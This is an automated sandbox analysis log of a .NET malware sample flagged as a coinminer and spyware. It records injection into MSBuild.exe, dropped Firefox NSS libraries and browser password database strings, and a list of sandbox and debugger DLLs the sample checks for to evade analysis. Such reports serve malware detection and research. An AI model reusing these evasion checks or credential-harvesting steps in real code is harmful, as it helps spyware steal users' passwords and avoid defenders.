                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1761810556.0000000005F50000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.000000000414D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe | Binary or memory string: hLegalCopyrightCopyright (c) Electronic Arts. All rights reserved.P&OriginalFilenameEAappInstaller.exe0 vs SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@3/26@1/2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_6CB17030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_00410AA0 CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,CloseHandle
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_00411020 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,HeapAlloc,wsprintfA,VariantClear
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.log
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe | Mutant created: NULL
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                        Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr | Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                        Source: MSBuild.exe, 00000001.00000002.2157065246.000000006CCEF000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000001.00000002.2148753612.0000000019948000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2139609144.00000000139D5000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sqln[1].dll.1.dr | Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                        Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr | Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
                        Source: MSBuild.exe, 00000001.00000002.2157065246.000000006CCEF000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000001.00000002.2148753612.0000000019948000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2139609144.00000000139D5000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sqln[1].dll.1.dr | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                        Source: MSBuild.exe, 00000001.00000002.2157065246.000000006CCEF000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000001.00000002.2148753612.0000000019948000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2139609144.00000000139D5000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sqln[1].dll.1.dr | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                        Source: MSBuild.exe, 00000001.00000002.2157065246.000000006CCEF000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000001.00000002.2148753612.0000000019948000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2139609144.00000000139D5000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sqln[1].dll.1.dr | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                        Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr | Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
                        Source: MSBuild.exe, 00000001.00000002.2148753612.0000000019948000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2139609144.00000000139D5000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.1.dr | Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                        Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr | Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                        Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr | Binary or memory string: SELECT ALL id FROM %s WHERE %s;
                        Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr | Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                        Source: MSBuild.exe, 00000001.00000002.2148753612.0000000019948000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2139609144.00000000139D5000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.1.dr | Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                        Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr | Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                        Source: MSBuild.exe, MSBuild.exe, 00000001.00000002.2157065246.000000006CCEF000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000001.00000002.2148753612.0000000019948000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2139609144.00000000139D5000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sqln[1].dll.1.dr | Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                        Source: MSBuild.exe, 00000001.00000002.2157065246.000000006CCEF000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000001.00000002.2148753612.0000000019948000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2139609144.00000000139D5000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sqln[1].dll.1.dr | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                        Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr | Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                        Source: MSBuild.exe, 00000001.00000002.2148753612.0000000019948000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2139609144.00000000139D5000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.1.dr | Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                        Source: BGHJJDGHCBGDHIECBGID.1.dr | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                        Source: MSBuild.exe, 00000001.00000002.2148753612.0000000019948000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2139609144.00000000139D5000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.1.dr | Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                        Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr | Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                        Source: MSBuild.exe, 00000001.00000002.2148753612.0000000019948000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2139609144.00000000139D5000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.1.dr | Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                        Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr | Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe | ReversingLabs: Detection: 23%
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe | Virustotal: Detection: 26%
                        Source: unknown | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe"
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe | Section loaded: mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, msasn1.dll, gpapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: sspicli.dll, wininet.dll, rstrtmgr.dll, ncrypt.dll, ntasn1.dll, dbghelp.dll, iertutil.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, msasn1.dll, dpapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, gpapi.dll, ncryptsslp.dll, wbemcomn.dll, amsi.dll, userenv.dll, version.dll, uxtheme.dll, sxs.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mozglue.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wsock32.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msvcp140.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeStatic file information: File size 2952808 > 1048576
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x26de00
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: mozglue.pdbP source: MSBuild.exe, 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
                        Source: Binary string: freebl3.pdb source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
                        Source: Binary string: freebl3.pdbp source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
                        Source: Binary string: nss3.pdb@ source: MSBuild.exe, 00000001.00000002.2157065246.000000006CCEF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
                        Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1750736116.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.0000000004209000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1761810556.0000000005F50000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1750736116.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.0000000004209000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1761810556.0000000005F50000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.1.dr, softokn3.dll.1.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.1.dr, vcruntime140.dll.1.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.1.dr, msvcp140[1].dll.1.dr
                        Source: Binary string: protobuf-net.pdbSHA256}Lq source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1750736116.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1761316124.0000000005EF0000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.0000000004209000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.000000000414D000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: nss3.pdb source: MSBuild.exe, 00000001.00000002.2157065246.000000006CCEF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
                        Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: MSBuild.exe, 00000001.00000002.2148753612.0000000019948000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2139609144.00000000139D5000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.1.dr
                        Source: Binary string: mozglue.pdb source: MSBuild.exe, 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
                        Source: Binary string: protobuf-net.pdb source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1750736116.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1761316124.0000000005EF0000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.0000000004209000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.000000000414D000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: softokn3.pdb source: softokn3[1].dll.1.dr, softokn3.dll.1.dr

                        Data Obfuscation

                        Source: 0.2.SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.5ef0000.16.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                        Source: 0.2.SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.5ef0000.16.raw.unpack, ListDecorator.cs.Net Code: Read
                        Source: 0.2.SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.5ef0000.16.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                        Source: 0.2.SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.5ef0000.16.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                        Source: 0.2.SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.5ef0000.16.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.4d48a78.10.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.4cf8a58.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.5d30000.15.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.414d5b0.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.4853278.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1760730113.0000000005D30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1752049015.000000000414D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1750736116.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1752049015.0000000004853000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe PID: 6308, type: MEMORYSTR
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_004185A0 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_004185A0
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeStatic PE information: real checksum: 0x262ceb should be: 0x2da921
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeCode function: 0_2_018DAC50 pushad ; retf 0_2_018DAC51
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeCode function: 0_2_0309480A pushad ; ret 0_2_030948C9
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeCode function: 0_2_03094810 pushad ; ret 0_2_030948C9
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeCode function: 0_2_057FBB0A push ds; iretd 0_2_057FBB11
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0041A4E5 push ecx; ret 1_2_0041A4F8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAEB536 push ecx; ret 1_2_6CAEB549
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqln[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_004185A0 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_004185A0
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe PID: 6308, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 4076, type: MEMORYSTR
                        Source: MSBuild.exeBinary or memory string: DIR_WATCH.DLL
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1750736116.00000000030D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL0SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE
                        Source: MSBuild.exeBinary or memory string: SBIEDLL.DLL
                        Source: MSBuild.exeBinary or memory string: API_LOG.DLL
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: AAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeMemory allocated: 18D0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeMemory allocated: 30D0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeMemory allocated: 50D0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqln[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI coverage: 5.6 %
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe TID: 3804Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00410370 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 004104A2h1_2_00410370
